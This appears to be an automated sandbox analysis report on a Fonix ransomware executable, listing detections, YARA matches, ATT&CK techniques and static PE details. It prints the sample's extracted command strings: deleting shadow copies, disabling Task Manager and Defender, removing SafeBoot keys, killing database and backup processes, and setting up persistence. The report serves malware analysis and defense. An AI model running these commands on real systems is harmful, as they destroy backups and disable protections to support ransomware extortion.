Play interactive tour

Edit tour

Analysis Report 8QxrJSmRtc

Overview

General Information

Sample Name:	8QxrJSmRtc (renamed file extension from none to exe)
Analysis ID:	338144
MD5:	6593b7ab157ac82967af0e92efa96134
SHA1:	c50e003f5c9ebeebc798b6f00b09aae05518d6cf
SHA256:	f8b132d8c750482bd5b6f03bae58f6805fb3480ef0904a21f0111ede5a1ebb1b
Most interesting Screenshot:

Detection

Fonix

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Fonix ransomware

Yara detected Ransomware_Generic

Deletes shadow drive data (may be related to ransomware)

May drop file containing decryption instructions (likely related to ransomware)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains sections with non-standard names

Program does not show much activity (idle)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Startup

System is w10x64

8QxrJSmRtc.exe (PID: 6768 cmdline: 'C:\Users\user\Desktop\8QxrJSmRtc.exe' MD5: 6593B7AB157AC82967AF0E92EFA96134)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
8QxrJSmRtc.exe	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
8QxrJSmRtc.exe	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security
00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security
Process Memory Space: 8QxrJSmRtc.exe PID: 6768	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: 8QxrJSmRtc.exe PID: 6768	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.8QxrJSmRtc.exe.13b0000.0.unpack	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
0.2.8QxrJSmRtc.exe.13b0000.0.unpack	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security
0.0.8QxrJSmRtc.exe.13b0000.0.unpack	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
0.0.8QxrJSmRtc.exe.13b0000.0.unpack	JoeSecurity_Fonix	Yara detected Fonix ransomware	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 8QxrJSmRtc.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: 8QxrJSmRtc.exe	Virustotal: Detection: 41%			Perma Link
Source: 8QxrJSmRtc.exe	ReversingLabs: Detection: 58%

Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_01408900 CryptReleaseContext,_Init_thread_footer,	0_2_01408900
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_014081C0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy,	0_2_014081C0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_014089F0 CryptGenRandom,CryptReleaseContext,	0_2_014089F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_01408330 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext,	0_2_01408330

Source: 8QxrJSmRtc.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: 8QxrJSmRtc.exe

Source: 8QxrJSmRtc.exe	String found in binary or memory: https://code.jquery.com/jquery-latest.js
Source: 8QxrJSmRtc.exe	String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif
Source: 8QxrJSmRtc.exe	String found in binary or memory: https://www.who.int

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Fonix ransomware

Show sources

Source: Yara match	File source: 8QxrJSmRtc.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY
Source: Yara match	File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE

Yara detected Ransomware_Generic

Show sources

Source: Yara match	File source: 8QxrJSmRtc.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY
Source: Yara match	File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp	Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
Source: 8QxrJSmRtc.exe	Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet

May drop file containing decryption instructions (likely related to ransomware)

Show sources

Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp	Binary or memory string: How To Decrypt Files.hta\Help.txt
Source: 8QxrJSmRtc.exe	Binary or memory string: How To Decrypt Files.hta\Help.txt

Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_0145F914	0_2_0145F914
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_01458928	0_2_01458928
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_0145F07C	0_2_0145F07C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013BE0E0	0_2_013BE0E0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013E30E0	0_2_013E30E0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_0146A32C	0_2_0146A32C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_01456330	0_2_01456330
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_014453D4	0_2_014453D4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_01451BDC	0_2_01451BDC
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013E1A70	0_2_013E1A70
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_0144F2C4	0_2_0144F2C4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013BCAD0	0_2_013BCAD0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_0144F548	0_2_0144F548
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013B6D20	0_2_013B6D20
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013E4D00	0_2_013E4D00
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013C5D40	0_2_013C5D40
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013E4580	0_2_013E4580
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_014094C0	0_2_014094C0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_0145DCC4	0_2_0145DCC4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013B84A0	0_2_013B84A0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013B13F0	0_2_013B13F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013B5CD0	0_2_013B5CD0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013E2700	0_2_013E2700
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_013C0F80	0_2_013C0F80
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_0144F7B0	0_2_0144F7B0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_014597B8	0_2_014597B8
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_014556B4	0_2_014556B4

Source: classification engine

Classification label: mal84.rans.evad.winEXE@1/0@0/0

Source: 8QxrJSmRtc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 8QxrJSmRtc.exe	Virustotal: Detection: 41%
Source: 8QxrJSmRtc.exe	ReversingLabs: Detection: 58%

Source: 8QxrJSmRtc.exe

Static file information: File size 1266176 > 1048576

Source: 8QxrJSmRtc.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: 8QxrJSmRtc.exe

Source: 8QxrJSmRtc.exe

Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\8QxrJSmRtc.exe

Code function: 0_2_01421020 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_01421020

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 8QxrJSmRtc.exe

Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EXEWINWORD.EXEWORDPAD.EXENOTEPAD.EXEPAINT.EXENOTEPAD++.EXEENDNOTE.EXEVMWAREUSER.EXEVMWARESERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXESANDBOXIEDCOMLAUNCH.EXEPROCMON.EXEREGMON.EXEFILEMON.EXEWIRESHARK.EXENETMON.EXEVMTOOLSD.EXENTOSKRNL.EXESSMS.EXECBSERVICE.EXEHTTPD.EXEJUSCHED.EXEJUCHECK.EXEJAVAW.EXEJAVA.EXEIPTRAY.EXEIPERIUS.EXEFILEZILLA.EXEDATACOLLECTORSVC.EXEEDGETRANSPORT.EXESTORE.EXEACROTRAY.EXEAGENT.EXESAGECSCLIENT.EXEWSUSSERVICE.EXESLACK.EXENODE.EXEW3WP.EXEMYSQL.EXEMSMDSRV.EXEMSDTSSRVR.EXEFDLAUNCHER.EXEFDHOST.EXEREPORTINGS

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: 8QxrJSmRtc.exe

Binary or memory string: Output error ::::].FONIXzip filecopy to path \Cpub.keyreg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /Freg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /Fstart cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Qstart cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exitstart up attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /Fcopy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exeXINOF.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /Freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /fflag C:\ProgramData\nonsnonsFlagblack list mms.exeschedul2.exeschedhelp.exetib_mounter_monitor.exeSQLIOSIM.EXESqlagent.exesqlmaint.exesqlstubss.execsrss.exesqlceip.exemstsc.exetaskmgr.exesqlservr.exeQBIDPService.exesqlserver.exemsftesql.exesqlagent.exesqlbrowser.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlpplussvc.exeisqlpussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exestream.exethebat.exethebat64.exeThunderbird.exevisio.exewinword.exewordpad.exenotepad.exepaint.exenotepad++.exeendnote.exevmwareuser.exevmwareservice.exevboxservice.exevboxtray.exeSandboxiedcomlaunch.exeprocmon.exeregmon.exefilemon.exewireshark.exenetmon.exevmtoolsd.exentoskrnl.exeSsms.execbService.exehttpd.exejusched.exejucheck.exejavaw.exejava.exeiptray.exeIperius.exeFileZilla.exeDataCollectorSvc.exeEdgeTransport.exestore.exeacrotray.exeagent.exeSageCSClient.exewsusservice.exeslack.exenode.exew3wp.exemysql.exemsmdsrv.exeMsDtsSrvr.exefdlauncher.exefdhost.exeReportingS

Source: C:\Users\user\Desktop\8QxrJSmRtc.exe

Code function: 0_2_01421FE8 GetLastError,IsDebuggerPresent,OutputDebugStringW,

0_2_01421FE8

Source: C:\Users\user\Desktop\8QxrJSmRtc.exe

Code function: 0_2_01421FE8 GetLastError,IsDebuggerPresent,OutputDebugStringW,

0_2_01421FE8

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_01422D3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_01422D3C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: 0_2_014517F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_014517F8

Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: EnumSystemLocalesW,	0_2_014691B4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: EnumSystemLocalesW,	0_2_014690E4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_014695F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_01468D98
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: try_get_function,GetLocaleInfoW,	0_2_0145D4B0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_014697CC
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe	Code function: EnumSystemLocalesW,	0_2_0145CEE0

Source: C:\Users\user\Desktop\8QxrJSmRtc.exe

Code function: 0_2_01423200 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_01423200

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Application Shimming1	Application Shimming1	File Deletion1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	System Information Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
8QxrJSmRtc.exe	41%	Virustotal		Browse
8QxrJSmRtc.exe	59%	ReversingLabs	Win64.Ransomware.Fonix
8QxrJSmRtc.exe	100%	Avira	HEUR/AGEN.1138883

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.8QxrJSmRtc.exe.13b0000.0.unpack	100%	Avira	HEUR/AGEN.1138883		Download File
0.2.8QxrJSmRtc.exe.13b0000.0.unpack	100%	Avira	HEUR/AGEN.1138883		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://uupload.ir/files/g510_windows_10.gif	8QxrJSmRtc.exe	false	high
https://www.who.int	8QxrJSmRtc.exe	false	high
https://code.jquery.com/jquery-latest.js	8QxrJSmRtc.exe	false	high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338144
Start date:	11.01.2021
Start time:	17:59:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	8QxrJSmRtc (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.rans.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 111
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.349484774601221
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8QxrJSmRtc.exe
File size:	1266176
MD5:	6593b7ab157ac82967af0e92efa96134
SHA1:	c50e003f5c9ebeebc798b6f00b09aae05518d6cf
SHA256:	f8b132d8c750482bd5b6f03bae58f6805fb3480ef0904a21f0111ede5a1ebb1b
SHA512:	2028cbd94372a900ada0a5daeb68a7608e2013adcac4750c36979d137e4c29b3c5a3e524b42e6b4563ad6d27b5990881f2fdab3ede5b1296ec4c4fb96cc0bbc6
SSDEEP:	24576:z9C4QYc8ntZP2sQQ0GqrCPQX8BYOzhjZAJZ1o:z9C4PnnP5QQ0xrj8Cshir
File Content Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........}P^...^...^.......J.......S............;.._.......O.......T...............Q...^...........r.......\......._......._...^..._..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4729a4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FF0BEEA [Sat Jan 2 18:43:54 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	0c0d7ab54c9443fe1117b1f5373e7fb1

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F2978719178h
dec eax
add esp, 28h
jmp 00007F2978718797h
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F2978718932h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F2978718935h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F297871892Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F2978717FD2h
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ecx
mov ebx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F2978718891h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11f698	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x138000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x12d000	0x9de0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
